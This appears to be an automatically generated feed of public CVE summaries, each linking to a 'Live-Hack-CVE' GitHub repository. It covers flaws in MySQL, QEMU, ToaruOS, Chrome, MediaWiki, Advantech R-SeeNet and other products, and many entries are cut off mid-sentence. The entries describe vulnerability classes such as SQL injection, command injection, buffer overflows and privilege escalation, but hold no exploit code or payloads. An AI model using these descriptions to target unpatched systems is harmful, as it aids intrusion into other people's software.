**iml32.dll in Adobe Shockwave Player before 11.5.7.609 does not validate a certain value from a file before using it in file-pointer calculations, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted .dir (aka Director) file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-1281](https://github.com/Live-Hack-CVE/CVE-2010-1281) create time: 2022-12-29T11:05:55Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.72 and earlier, 5.5.34 and earlier, and 5.6.14 and earlier allows remote attackers to affect availability via unknown vectors related to Error Handling. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-5908](https://github.com/Live-Hack-CVE/CVE-2013-5908) create time: 2022-12-29T11:06:54Z

**The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-0207](https://github.com/Live-Hack-CVE/CVE-2014-0207) create time: 2022-12-29T11:14:34Z

**The gdImageCreateFromXpm function in gdxpm.c in libgd, as used in PHP 5.4.26 and earlier, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted color table in an XPM file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-2497](https://github.com/Live-Hack-CVE/CVE-2014-2497) create time: 2022-12-29T11:14:31Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.36 and earlier and 5.6.16 and earlier allows remote attackers to affect availability via unknown vectors related to Options. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-2431](https://github.com/Live-Hack-CVE/CVE-2014-2431) create time: 2022-12-29T11:06:47Z

**Qemu before 1.6.2 block diver for the various disk image formats used by Bochs and for the QCOW version 2 format, are vulnerable to a possible crash caused by signed data types or a logic error while creating QCOW2 snapshots, which leads to incorrectly calling update_refcount() routine. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-0147](https://github.com/Live-Hack-CVE/CVE-2014-0147) create time: 2022-12-29T10:34:16Z

**QEMU before 2.0.0 block drivers for CLOOP, QCOW2 version 2 and various other image formats are vulnerable to potential memory corruptions, integer/buffer overflows or crash caused by missing input validations which could allow a remote user to execute arbitrary code on the host with the privileges of the QEMU process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-0144](https://github.com/Live-Hack-CVE/CVE-2014-0144) create time: 2022-12-29T10:33:28Z

**Qemu before 2.0 block driver for Hyper-V VHDX Images is vulnerable to infinite loops and other potential issues when calculating BAT entries, due to missing bounds checks for block_size and logical_sector_size variables. These are used to derive other fields like 'sectors_per_block' etc. A user able to alter the Qemu d CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-0148](https://github.com/Live-Hack-CVE/CVE-2014-0148) create time: 2022-12-29T10:33:24Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : SP. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-4836](https://github.com/Live-Hack-CVE/CVE-2015-4836) create time: 2022-12-29T11:06:43Z

**Unrestricted file upload vulnerability in the (1) myAccount, (2) projects, (3) tasks, (4) tickets, (5) discussions, (6) reports, and (7) scheduler pages in qdPM 8.3 allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-3884](https://github.com/Live-Hack-CVE/CVE-2015-3884) create time: 2022-12-29T11:05:33Z

**IBM Java Security Components in IBM SDK, Java Technology Edition 8 before SR1 FP10, 7 R1 before SR3 FP10, 7 before SR9 FP10, 6 R1 before SR8 FP7, 6 before SR16 FP7, and 5.0 before SR16 FP13 stores plaintext information in memory dumps, which allows local users to obtain sensitive information by reading a file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-1931](https://github.com/Live-Hack-CVE/CVE-2015-1931) create time: 2022-12-29T10:28:47Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Error Handling). Supported versions that are affected are 5.5.53 and earlier, 5.6.34 and earlier and 5.7.16 and earlier. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Serv CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-3318](https://github.com/Live-Hack-CVE/CVE-2017-3318) create time: 2022-12-29T11:06:23Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.5.57 and earlier, 5.6.37 and earlier and 5.7.19 and earlier. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10268](https://github.com/Live-Hack-CVE/CVE-2017-10268) create time: 2022-12-29T11:06:20Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Logging). Supported versions that are affected are 5.5.53 and earlier, 5.6.34 and earlier and 5.7.16 and earlier. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-3317](https://github.com/Live-Hack-CVE/CVE-2017-3317) create time: 2022-12-29T11:06:16Z

**An issue was discovered in Gradle Enterprise 2017.3 - 2020.2.4 and Gradle Enterprise Build Cache Node 1.0 - 9.2. Unrestricted HTTP header reflection in Gradle Enterprise allows remote attackers to obtain authentication cookies, if they are able to discover a separate XSS vulnerability. This potentially allows an attack CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15768](https://github.com/Live-Hack-CVE/CVE-2020-15768) create time: 2022-12-29T10:27:12Z

**An issue was discovered in Gradle Enterprise 2017.1 - 2020.2.4. The /usage page of Gradle Enterprise conveys high level build information such as project names and build counts over time. This page is incorrectly viewable anonymously. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15775](https://github.com/Live-Hack-CVE/CVE-2020-15775) create time: 2022-12-29T10:27:05Z

**An issue was discovered in Gradle Enterprise 2018.5. An attacker can potentially make repeated attempts to guess a local user's password, due to lack of lock-out after excessive failed logins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15770](https://github.com/Live-Hack-CVE/CVE-2020-15770) create time: 2022-12-29T10:27:16Z

**An issue was discovered in Gradle Enterprise 2018.5 - 2020.2.4. An attacker with physical access to the browser of a user who has recently logged in to Gradle Enterprise and since closed their browser could reopen their browser to access Gradle Enterprise as that user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15774](https://github.com/Live-Hack-CVE/CVE-2020-15774) create time: 2022-12-29T10:27:09Z

**An issue was discovered in Gradle Enterprise 2018.5 - 2020.2.4. When configuring Gradle Enterprise to integrate with a SAML identity provider, an XML metadata file can be uploaded by an administrator. The server side processing of this file dereferences XML External Entities (XXE), allowing a remote attacker with admin CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15772](https://github.com/Live-Hack-CVE/CVE-2020-15772) create time: 2022-12-29T10:27:01Z

**An issue was discovered in Gradle Enterprise 2018.2 - 2020.2.4. The CSRF prevention token is stored in a request cookie that is not annotated as HttpOnly. An attacker with the ability to execute arbitrary code in a user's browser could impose an arbitrary value for this token, allowing them to perform cross-site reques CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15776](https://github.com/Live-Hack-CVE/CVE-2020-15776) create time: 2022-12-29T10:26:58Z

**A maliciously crafted GIF or JPEG files when parsed through Autodesk Design Review 2018, and AutoCAD 2023 and 2022 could be used to write beyond the allocated heap buffer. This vulnerability could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33889](https://github.com/Live-Hack-CVE/CVE-2022-33889) create time: 2022-12-29T10:24:46Z

**linker/linker.c in ToaruOS through 1.10.9 has insecure LD_LIBRARY_PATH handling in setuid applications. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13046](https://github.com/Live-Hack-CVE/CVE-2019-13046) create time: 2022-12-29T10:33:17Z

**apps/gsudo.c in gsudo in ToaruOS through 1.10.9 has a buffer overflow allowing local privilege escalation to the root user via the DISPLAY environment variable. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-12937](https://github.com/Live-Hack-CVE/CVE-2019-12937) create time: 2022-12-29T10:32:53Z

**kernel/sys/syscall.c in ToaruOS through 1.10.9 allows a denial of service upon a critical error in certain sys_sbrk allocation patterns (involving PAGE_SIZE, and a value less than PAGE_SIZE). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13048](https://github.com/Live-Hack-CVE/CVE-2019-13048) create time: 2022-12-29T10:32:50Z

**kernel/sys/syscall.c in ToaruOS through 1.10.9 has incorrect access control in sys_sysfunc case 9 for TOARU_SYS_FUNC_SETHEAP, allowing arbitrary kernel pages to be mapped into user land, leading to root access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13047](https://github.com/Live-Hack-CVE/CVE-2019-13047) create time: 2022-12-29T10:32:46Z

**An integer wrap in kernel/sys/syscall.c in ToaruOS 1.10.10 allows users to map arbitrary kernel pages into userland process space via TOARU_SYS_FUNC_MMAP, leading to escalation of privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13049](https://github.com/Live-Hack-CVE/CVE-2019-13049) create time: 2022-12-29T10:32:42Z

**Double free in DOMStorage in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5797](https://github.com/Live-Hack-CVE/CVE-2019-5797) create time: 2022-12-29T10:29:04Z

**Vulnerability in the Java SE product of Oracle Java SE (component: JavaFX). The supported version that is affected is Java SE: 8u251. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a p CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14664](https://github.com/Live-Hack-CVE/CVE-2020-14664) create time: 2022-12-29T11:14:45Z

**A flaw was found in Poppler in the way certain PDF files were converted into HTML. A remote attacker could exploit this flaw by providing a malicious PDF file that, when processed by the 'pdftohtml' program, would crash the application causing a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27778](https://github.com/Live-Hack-CVE/CVE-2020-27778) create time: 2022-12-29T11:14:38Z

**In LibRaw, an out-of-bounds read vulnerability exists within the "simple_decode_row()" function (libraw\src\x3f\x3f_utils_patched.cpp) which can be triggered via an image with a large row_stride field. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35532](https://github.com/Live-Hack-CVE/CVE-2020-35532) create time: 2022-12-29T11:07:19Z

**In LibRaw, an out-of-bounds read vulnerability exists within the get_huffman_diff() function (libraw\src\x3f\x3f_utils_patched.cpp) when reading data from an image file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35531](https://github.com/Live-Hack-CVE/CVE-2020-35531) create time: 2022-12-29T11:07:12Z

**In LibRaw, there is an out-of-bounds write vulnerability within the "new_node()" function (libraw\src\x3f\x3f_utils_patched.cpp) that can be triggered via a crafted X3F file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35530](https://github.com/Live-Hack-CVE/CVE-2020-35530) create time: 2022-12-29T11:07:01Z

**Jact OpenClinic 0.8.20160412 allows the attacker to read server files after login to the the admin account by an infected 'file' GET parameter in '/shared/view_source.php' which "could" lead to RCE vulnerability . CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-20444](https://github.com/Live-Hack-CVE/CVE-2020-20444) create time: 2022-12-29T11:06:13Z

**phpCMS 2008 sp4 allowas remote malicious users to execute arbitrary php commands via the pagesize parameter to yp/product.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-22201](https://github.com/Live-Hack-CVE/CVE-2020-22201) create time: 2022-12-29T11:06:09Z

**phpwcms 1.9.13 is vulnerable to Code Injection via /phpwcms/setup/setup.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21784](https://github.com/Live-Hack-CVE/CVE-2020-21784) create time: 2022-12-29T11:06:06Z

**White Shark System (WSS) 1.3.2 is vulnerable to sensitive information disclosure via default_task_add.php, remote attackers can exploit the vulnerability to create a task. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-20467](https://github.com/Live-Hack-CVE/CVE-2020-20467) create time: 2022-12-29T11:06:02Z

**White Shark System (WSS) 1.3.2 has web site physical path leakage vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-20470](https://github.com/Live-Hack-CVE/CVE-2020-20470) create time: 2022-12-29T11:05:58Z

**BigProf Online Invoicing System before 2.9 suffers from an unauthenticated SQL Injection found in /membership_passwordReset.php (the endpoint that is responsible for issuing self-service password resets). An unauthenticated attacker is able to send a request containing a crafted payload that can result in sensitive inf CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35674](https://github.com/Live-Hack-CVE/CVE-2020-35674) create time: 2022-12-29T10:34:19Z

**In BigBlueButton before 2.2.7, lockSettingsProps.disablePrivateChat does not apply to already opened chats. This occurs in bigbluebutton-html5/imports/ui/components/chat/service.js. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27601](https://github.com/Live-Hack-CVE/CVE-2020-27601) create time: 2022-12-29T10:33:41Z

**BigProf Online Invoicing System before 3.0 offers a functionality that allows an administrator to move the records of members across groups. The applicable endpoint (admin/pageTransferOwnership.php) lacks CSRF protection, resulting in an attacker being able to escalate their privileges to Administrator and effectively CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35675](https://github.com/Live-Hack-CVE/CVE-2020-35675) create time: 2022-12-29T10:33:34Z

**BigBlueButton before 2.2.7 does not have a protection mechanism for separator injection in meetingId, userId, and authToken. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27602](https://github.com/Live-Hack-CVE/CVE-2020-27602) create time: 2022-12-29T10:33:31Z

**A local file inclusion (LFI) vulnerability exists in the options.php script functionality of Advantech R-SeeNet v 2.4.12 (20.10.2020). A specially crafted HTTP request can lead to arbitrary PHP code execution. An attacker can send a crafted HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21804](https://github.com/Live-Hack-CVE/CVE-2021-21804) create time: 2022-12-29T10:29:58Z

**A specially crafted document can cause the document parser to copy data from a particular record type into a static-sized buffer within an object that is smaller than the size used for the copy, which will cause a heap-based buffer overflow. In version/Instance 0x0004 and 0x0015, an attacker can entice the victim to op CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27249](https://github.com/Live-Hack-CVE/CVE-2020-27249) create time: 2022-12-29T10:29:51Z

**In SoftMaker Software GmbH SoftMaker Office PlanMaker 2021 (Revision 1014), a specially crafted document can cause the document parser to copy data from a particular record type into a static-sized buffer within an object that is smaller than the size used for the copy, which will cause a heap-based buffer overflow at CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27250](https://github.com/Live-Hack-CVE/CVE-2020-27250) create time: 2022-12-29T10:29:47Z

**A specially crafted document can cause the document parser to copy data from a particular record type into a static-sized buffer within an object that is smaller than the size used for the copy, which will cause a heap-based buffer overflow. An attacker can entice the victim to open a document to trigger this vulnerabi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28587](https://github.com/Live-Hack-CVE/CVE-2020-28587) create time: 2022-12-29T10:29:44Z

**An exploitable local privilege elevation vulnerability exists in the file system permissions of Advantech WebAccess/SCADA 9.0.1 installation. In webvrpcs Run Key Privilege Escalation in installation folder of WebAccess, an attacker can either replace binary or loaded modules to execute code with NT SYSTEM privilege. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13554](https://github.com/Live-Hack-CVE/CVE-2020-13554) create time: 2022-12-29T10:29:12Z

**The 802.11 standard that underpins Wi-Fi Protected Access (WPA, WPA2, and WPA3) and Wired Equivalent Privacy (WEP) doesn't require that the A-MSDU flag in the plaintext QoS header field is authenticated. Against devices that support receiving non-SSP A-MSDU frames (which is mandatory as part of 802.11n), an adversary c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24588](https://github.com/Live-Hack-CVE/CVE-2020-24588) create time: 2022-12-29T10:28:54Z

**An issue was discovered in the kernel in NetBSD 7.1. An Access Point (AP) forwards EAPOL frames to other clients even though the sender has not yet successfully authenticated to the AP. This might be abused in projected Wi-Fi networks to launch denial-of-service attacks against connected clients and makes it easier to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26139](https://github.com/Live-Hack-CVE/CVE-2020-26139) create time: 2022-12-29T10:28:50Z

**Cross-site scripting vulnerabilities exist in the ssh_form.php script functionality of Advantech R-SeeNet v 2.4.12 (20.10.2020). If a user visits a specially crafted URL, it can lead to arbitrary JavaScript code execution in the context of the targeted user’s browser. An attacker can provide a crafted URL to trigger th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21800](https://github.com/Live-Hack-CVE/CVE-2021-21800) create time: 2022-12-29T10:28:22Z

**Cross-site scripting vulnerabilities exist in the telnet_form.php script functionality of Advantech R-SeeNet v 2.4.12 (20.10.2020). If a user visits a specially crafted URL, it can lead to arbitrary JavaScript code execution in the context of the targeted user’s browser. An attacker can provide a crafted URL to trigger CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21799](https://github.com/Live-Hack-CVE/CVE-2021-21799) create time: 2022-12-29T10:28:19Z

**An OS Command Injection vulnerability exists in the ping.php script functionality of Advantech R-SeeNet v 2.4.12 (20.10.2020). A specially crafted HTTP request can lead to arbitrary OS command execution. An attacker can send a crafted HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21805](https://github.com/Live-Hack-CVE/CVE-2021-21805) create time: 2022-12-29T10:28:11Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Audit Plug-in). Supported versions that are affected are 8.0.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulne CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14591](https://github.com/Live-Hack-CVE/CVE-2020-14591) create time: 2022-12-29T10:28:00Z

**Cross-site scripting vulnerability in CyberMail Ver.6.x and Ver.7.x allows remote attackers to inject arbitrary script or HTML via a specially crafted URL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-5540](https://github.com/Live-Hack-CVE/CVE-2020-5540) create time: 2022-12-29T10:27:57Z

**Delta Electronics TPEditor Versions 1.97 and prior. A write-what-where condition may be exploited by processing a specially crafted project file. Successful exploitation of this vulnerability may allow an attacker to read/modify information, execute arbitrary code, and/or crash the application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16225](https://github.com/Live-Hack-CVE/CVE-2020-16225) create time: 2022-12-29T10:27:53Z

**Delta Electronics TPEditor Versions 1.97 and prior. A stack-based buffer overflow may be exploited by processing a specially crafted project file. Successful exploitation of this vulnerability may allow an attacker to read/modify information, execute arbitrary code, and/or crash the application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16221](https://github.com/Live-Hack-CVE/CVE-2020-16221) create time: 2022-12-29T10:27:50Z

**Delta Electronics TPEditor Versions 1.97 and prior. An out-of-bounds read may be exploited by processing specially crafted project files. Successful exploitation of this vulnerability may allow an attacker to read/modify information, execute arbitrary code, and/or crash the application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16219](https://github.com/Live-Hack-CVE/CVE-2020-16219) create time: 2022-12-29T10:27:26Z

**Delta Electronics TPEditor Versions 1.97 and prior. A heap-based buffer overflow may be exploited by processing a specially crafted project file. Successful exploitation of this vulnerability may allow an attacker to read/modify information, execute arbitrary code, and/or crash the application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16223](https://github.com/Live-Hack-CVE/CVE-2020-16223) create time: 2022-12-29T10:27:22Z

**A CVE-352 Cross-Site Request Forgery (CSRF) vulnerability exists that could allow an attacker to impersonate the user or carry out actions on their behalf when crafted malicious parameters are submitted in POST requests sent to the charging station web server. Affected Products: EVlink City EVC1S22P4 / EVC1S7P4 (All ve CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22725](https://github.com/Live-Hack-CVE/CVE-2021-22725) create time: 2022-12-29T11:14:27Z

**A CVE-352 Cross-Site Request Forgery (CSRF) vulnerability exists that could allow an attacker to impersonate the user or carry out actions on their behalf when crafted malicious parameters are submitted in POST requests sent to the charging station web server. Affected Products: EVlink City EVC1S22P4 / EVC1S7P4 (All ve CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22724](https://github.com/Live-Hack-CVE/CVE-2021-22724) create time: 2022-12-29T11:14:24Z

**SQL Injection vulnerability exists in version 1.0 of the Resumes Management and Job Application Website application login form by EGavilan Media that allows authentication bypass through login.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41433](https://github.com/Live-Hack-CVE/CVE-2021-41433) create time: 2022-12-29T11:14:20Z

**In PEPPERL+FUCHS WirelessHART-Gateway <= 3.0.8 a vulnerability may allow remote attackers to rewrite links and URLs in cached pages to arbitrary strings. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34559](https://github.com/Live-Hack-CVE/CVE-2021-34559) create time: 2022-12-29T11:10:50Z

**In PEPPERL+FUCHS WirelessHART-Gateway 3.0.7 to 3.0.9 the SSH and telnet services are active with hard-coded credentials. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34565](https://github.com/Live-Hack-CVE/CVE-2021-34565) create time: 2022-12-29T11:10:47Z

**In PEPPERL+FUCHS WirelessHART-Gateway 3.0.8 and 3.0.9 the HttpOnly attribute is not set on a cookie. This allows the cookie's value to be read or set by client-side JavaScript. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34563](https://github.com/Live-Hack-CVE/CVE-2021-34563) create time: 2022-12-29T11:10:44Z

**In PEPPERL+FUCHS WirelessHART-Gateway 3.0.8 it is possible to inject arbitrary JavaScript into the application's response. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34562](https://github.com/Live-Hack-CVE/CVE-2021-34562) create time: 2022-12-29T11:10:40Z

**In PEPPERL+FUCHS WirelessHART-Gateway <= 3.0.8 serious issue exists, if the application is not externally accessible or uses IP-based access restrictions. Attackers can use DNS Rebinding to bypass any IP or firewall based access restrictions that may be in place, by proxying through their target's browser. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34561](https://github.com/Live-Hack-CVE/CVE-2021-34561) create time: 2022-12-29T11:10:37Z

**In PEPPERL+FUCHS WirelessHART-Gateway <= 3.0.9 a form contains a password field with autocomplete enabled. The stored credentials can be captured by an attacker who gains control over the user's computer. Therefore the user must have logged in at least once. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34560](https://github.com/Live-Hack-CVE/CVE-2021-34560) create time: 2022-12-29T11:10:33Z

**A path traversal vulnerability exists within GoAnywhere MFT before 6.8.3 that utilize self-registration for the GoAnywhere Web Client. This vulnerability could potentially allow an external user who self-registers with a specific username and/or profile information to gain access to files at a higher directory level th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46830](https://github.com/Live-Hack-CVE/CVE-2021-46830) create time: 2022-12-29T11:09:54Z

**A vulnerability was found in ImageMagick-7.0.11-5, where executing a crafted file with the convert command, ASAN detects memory leaks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3574](https://github.com/Live-Hack-CVE/CVE-2021-3574) create time: 2022-12-29T11:09:42Z

**A heap use after free issue was found in Opensc before version 0.22.0 in sc_file_valid. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42779](https://github.com/Live-Hack-CVE/CVE-2021-42779) create time: 2022-12-29T11:09:16Z

**A use after return issue was found in Opensc before version 0.22.0 in insert_pin function that could potentially crash programs using the library. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42780](https://github.com/Live-Hack-CVE/CVE-2021-42780) create time: 2022-12-29T11:09:13Z

**A heap double free issue was found in Opensc before version 0.22.0 in sc_pkcs15_free_tokeninfo. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42778](https://github.com/Live-Hack-CVE/CVE-2021-42778) create time: 2022-12-29T11:09:09Z

**Stack buffer overflow issues were found in Opensc before version 0.22.0 in various places that could potentially crash programs using the library. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42782](https://github.com/Live-Hack-CVE/CVE-2021-42782) create time: 2022-12-29T11:09:05Z

**Heap buffer overflow issues were found in Opensc before version 0.22.0 in pkcs15-oberthur.c that could potentially crash programs using the library. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42781](https://github.com/Live-Hack-CVE/CVE-2021-42781) create time: 2022-12-29T11:09:02Z

**IBM Spectrum Protect Client 7.1 and 8.1 is vulnerable to a stack based buffer overflow, caused by improper bounds checking. A local attacker could exploit this vulnerability and cause a denial of service. IBM X-Force ID: 214438. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39048](https://github.com/Live-Hack-CVE/CVE-2021-39048) create time: 2022-12-29T11:07:22Z

**An integer overflow was addressed with improved input validation. This issue is fixed in Security Update 2021-005 Catalina, iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6, watchOS 7.6.2. Processing a maliciously crafted PDF may lead to arbitrary code execution. Apple is aware of a report that this issue may have been act CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30860](https://github.com/Live-Hack-CVE/CVE-2021-30860) create time: 2022-12-29T11:05:22Z

**An arbitrary file read vulnerability was found in Metersphere v1.15.4, where authenticated users can read any file on the server via the file download function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45789](https://github.com/Live-Hack-CVE/CVE-2021-45789) create time: 2022-12-29T11:05:08Z

**An issue was discovered in FusionPBX before 4.5.30. The log_viewer.php Log View page allows an authenticated user to choose an arbitrary filename for download (i.e., not necessarily freeswitch.log in the intended directory). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43403](https://github.com/Live-Hack-CVE/CVE-2021-43403) create time: 2022-12-29T11:05:03Z

**An issue was discovered in the Growth extension in MediaWiki through 1.36.2. Any admin can add arbitrary JavaScript code to the Newcomer home page footer, which can be executed by viewers with zero edits. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42048](https://github.com/Live-Hack-CVE/CVE-2021-42048) create time: 2022-12-29T11:04:57Z

**An issue was discovered in the GlobalWatchlist extension in MediaWiki through 1.36.2. The rev-deleted-user and ntimes messages were not properly escaped and allowed for users to inject HTML and JavaScript. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42046](https://github.com/Live-Hack-CVE/CVE-2021-42046) create time: 2022-12-29T11:04:31Z

**An authentication bypass risk was identified in the external database authentication functionality, due to a type juggling vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40693](https://github.com/Live-Hack-CVE/CVE-2021-40693) create time: 2022-12-29T10:34:26Z

**A session hijack risk was identified in the Shibboleth authentication plugin. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40691](https://github.com/Live-Hack-CVE/CVE-2021-40691) create time: 2022-12-29T10:34:23Z

**An arbitrary file upload vulnerability was found in Metersphere v1.15.4. Unauthenticated users can upload any file to arbitrary directory, where attackers can write a cron job to execute commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45790](https://github.com/Live-Hack-CVE/CVE-2021-45790) create time: 2022-12-29T10:34:06Z

**Time-based SQL Injection vulnerabilities were found in Metersphere v1.15.4 via the "orders" parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45788](https://github.com/Live-Hack-CVE/CVE-2021-45788) create time: 2022-12-29T10:34:02Z

**An issue was discovered in the Translate extension in MediaWiki through 1.36.2. Oversighters cannot undo revisions or oversight on pages where they suppressed information (such as PII). This allows oversighters to whitewash revisions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42049](https://github.com/Live-Hack-CVE/CVE-2021-42049) create time: 2022-12-29T10:33:58Z

**An issue was discovered in the Growth extension in MediaWiki through 1.36.2. On any Wiki with the Mentor Dashboard feature enabled, users can login with a mentor account and trigger an XSS payload (such as alert) via Growthexperiments-mentor-dashboard-mentee-overview-no-js-fallback. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42047](https://github.com/Live-Hack-CVE/CVE-2021-42047) create time: 2022-12-29T10:33:55Z

**An issue was discovered in SecurePoll in the Growth extension in MediaWiki through 1.36.2. Simple polls allow users to create alerts by changing their User-Agent HTTP header and submitting a vote. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42045](https://github.com/Live-Hack-CVE/CVE-2021-42045) create time: 2022-12-29T10:33:52Z

**Data leak in Canvas in Google Chrome prior to 99.0.4844.51 allowed a remote attacker who convinced a user to engage in screen sharing to potentially leak cross-origin data via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0806](https://github.com/Live-Hack-CVE/CVE-2022-0806) create time: 2022-12-29T11:15:08Z

**Use after free in Browser Switcher in Google Chrome prior to 99.0.4844.51 allowed a remote attacker who convinced a user to engage in specific user interaction to potentially exploit heap corruption via user interaction. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0805](https://github.com/Live-Hack-CVE/CVE-2022-0805) create time: 2022-12-29T11:15:04Z

